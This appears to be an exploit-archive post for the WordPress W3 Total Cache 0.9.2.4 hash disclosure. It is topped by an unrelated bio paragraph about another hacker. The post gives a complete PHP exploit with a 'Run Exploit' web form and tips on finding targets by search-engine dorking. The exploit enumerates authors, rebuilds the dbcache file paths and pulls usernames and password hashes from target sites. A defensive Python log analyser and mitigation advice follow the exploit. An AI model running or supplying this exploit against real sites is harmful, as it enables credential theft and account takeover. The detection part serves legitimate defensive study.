Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

=============================================================================================================================================
| # Title : WordPress W3 Total Cache 0.9.2.4 Hash disclosure vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.WordPress.org/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: The code is an exploit for the W3 Total Cache plugin for WordPress, which searches for user data stored in the database cache and retrieves usernames and password hashes.

(linked: https://packetstorm.news/files/id/180672/ Linked CVE numbers: ),

[+] save code as poc.php.

[+] Usage : http://127.0.0.1/poc.php

[+] PayLoad :

<?php

set_time_limit(300); // set the maximum execution time to 300 seconds

class WordpressW3TCExploit {
    private $tablePrefix;
    private $siteIterations;
    private $userIterations;
    private $targetUrl;

    public function __construct($targetUrl, $tablePrefix = 'wp_', $siteIterations = 25, $userIterations = 25) {
        $this->tablePrefix = $tablePrefix;
        $this->siteIterations = $siteIterations;
        $this->userIterations = $userIterations;
        $this->targetUrl = rtrim($targetUrl, '/');
    }

    // Plain GET; TLS verification is switched off so a self-signed target does not abort the run.
    private function sendRequest($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    // Requesting /?author=N makes WordPress load that user's row, which W3TC then writes to its database cache.
    private function cacheUserInfo($userId) {
        $url = $this->targetUrl . "/?author=" . $userId;
        $this->sendRequest($url);
    }

    private function md5Hash($string) {
        return md5($string);
    }

    public function run() {
        $usersFound = false;
        $results = "";

        for ($siteId = 1; $siteId <= $this->siteIterations; $siteId++) {
            $results .= "Trying site_id {$siteId}...<br>";

            for ($userId = 1; $userId <= $this->userIterations; $userId++) {
                $results .= "Trying user_id {$userId}...<br>";

                $this->cacheUserInfo($userId);

                // Rebuild the cache key the PoC expects the plugin to use: md5 of the SQL query,
                // wrapped as "w3tc_<host>_<site_id>_sql_<md5>", hashed again and split into a
                // three-level directory path under wp-content/w3tc/dbcache/.
                $query = "SELECT * FROM {$this->tablePrefix}users WHERE ID = '{$userId}'";
                $queryMd5 = $this->md5Hash($query);
                $key = "w3tc_" . parse_url($this->targetUrl, PHP_URL_HOST) . "_{$siteId}_sql_{$queryMd5}";
                $keyMd5 = $this->md5Hash($key);
                $hashPath = "{$keyMd5[0]}/{$keyMd5[1]}/{$keyMd5[2]}/{$keyMd5}";
                $url = "{$this->targetUrl}/wp-content/w3tc/dbcache/{$hashPath}";

                $result = $this->sendRequest($url);

                if (!$result) {
                    $results .= "No response received<br>";
                    continue;
                }

                // Cached rows are PHP-serialized; pull user_login and user_pass out of the serialized string.
                if (preg_match('/.*"user_login";s:\d+:"([^"]*)";s:\d+:"user_pass";s:\d+:"([^"]*)".*/', $result, $matches)) {
                    // Escape the recovered values before they are echoed into the results page.
                    $login = htmlspecialchars($matches[1], ENT_QUOTES, 'UTF-8');
                    $hash  = htmlspecialchars($matches[2], ENT_QUOTES, 'UTF-8');
                    $results .= "<strong>Found:</strong> Username: {$login} | Password Hash: {$hash}<br>";
                    $usersFound = true;
                }
            }
        }

        if (!$usersFound) {
            $results .= "<strong>No users found :(</strong><br>";
        }
        return $results;
    }
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $target = isset($_POST['target_url']) ? trim($_POST['target_url']) : '';
    // Reject anything that is not a syntactically valid URL before handing it to curl.
    if (filter_var($target, FILTER_VALIDATE_URL) === false) {
        $result = "Invalid target URL<br>";
    } else {
        $exploit = new WordpressW3TCExploit($target);
        $result = $exploit->run();
    }
} else {
    $result = "";
}
?>

<!DOCTYPE html>
<html>
<head>
<title>WordPress W3TC Exploit</title>
</head>
<body>
<h2>WordPress W3TC Exploit</h2>
<form method="POST">
<label for="target_url">Target URL:</label>
<input type="text" name="target_url" required>
<button type="submit">Run Exploit</button>
</form>
<h3>Results:</h3>
<div><?php echo $result; ?></div>
</body>
</html>
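The PoC above leaves two traces on the target's web server: a run of /?author=N requests from one client (which primes the database cache) and direct GETs under /wp-content/w3tc/dbcache/, where a 200 response means a cache file was actually served. The following Python log analyser is an added example, not part of the advisory or of the W3 Total Cache plugin; it parses constructed access-log lines in the common "combined" format (the 301 for /?author=N is assumed, since WordPress normally redirects that request to the author archive) and the enumeration threshold of five distinct author IDs is an arbitrary choice.

```python
"""Detect the W3TC dbcache disclosure pattern in web-server access logs.

Added example. The log lines below are constructed, not real traffic.
"""
import re
from collections import defaultdict

# Constructed sample in Apache/nginx "combined" format: one client enumerates
# authors and probes the cache directory (one probe succeeds); a second client
# looks like an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /wp-content/w3tc/dbcache/0/a/1/0a1fEXAMPLE HTTP/1.1" 404 196 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "GET /wp-content/w3tc/dbcache/3/b/9/3b9fEXAMPLE HTTP/1.1" 200 1342 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:03 +0000] "GET /?author=3 HTTP/1.1" 301 0 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:03 +0000] "GET /wp-content/w3tc/dbcache/7/c/2/7c2dEXAMPLE HTTP/1.1" 404 196 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:04 +0000] "GET /?author=4 HTTP/1.1" 301 0 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:04 +0000] "GET /?author=5 HTTP/1.1" 301 0 "-" "curl/8.6.0"
203.0.113.7 - - [10/Mar/2025:12:00:05 +0000] "GET /?author=6 HTTP/1.1" 301 0 "-" "curl/8.6.0"
198.51.100.9 - - [10/Mar/2025:12:01:00 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2025:12:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
AUTHOR_RE = re.compile(r'^/\?author=(\d+)$')
DBCACHE_RE = re.compile(r'^/wp-content/w3tc/dbcache/')


def parse_line(line):
    """Return a dict with ip, ts, method, path, status (int) or None if unparseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(log_text, author_threshold=5):
    """Summarise enumeration and cache-directory access found in the log text.

    author_enumerators: ip -> number of distinct author IDs requested, for clients
                        at or above the threshold.
    dbcache_requests:   every (ip, path, status) under /wp-content/w3tc/dbcache/.
    dbcache_served:     the subset answered with 200, i.e. a cache file was disclosed.
    """
    author_ids = defaultdict(set)
    dbcache_requests = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        am = AUTHOR_RE.match(rec["path"])
        if am:
            author_ids[rec["ip"]].add(int(am.group(1)))
        elif DBCACHE_RE.match(rec["path"]):
            dbcache_requests.append((rec["ip"], rec["path"], rec["status"]))
    enumerators = {ip: len(ids) for ip, ids in author_ids.items() if len(ids) >= author_threshold}
    served = [r for r in dbcache_requests if r[2] == 200]
    return {
        "author_enumerators": enumerators,
        "dbcache_requests": dbcache_requests,
        "dbcache_served": served,
    }


if __name__ == "__main__":
    findings = analyse(SAMPLE_LOG)
    for ip, n in findings["author_enumerators"].items():
        print(f"author enumeration: {ip} requested {n} distinct author IDs")
    for ip, path, status in findings["dbcache_requests"]:
        tag = "DISCLOSED" if status == 200 else "probe"
        print(f"dbcache {tag}: {ip} {path} -> {status}")
```

A 200 under /wp-content/w3tc/dbcache/ is the finding to act on: it shows the web server is handing out the plugin's cache files, and denying HTTP access to that directory (or keeping the cache outside the web root) closes the path the PoC relies on. The 404 probes and the author enumeration from the same client are the supporting context that distinguishes this from a stray crawler hit.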


===================================================================================================
| Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
===================================================================================================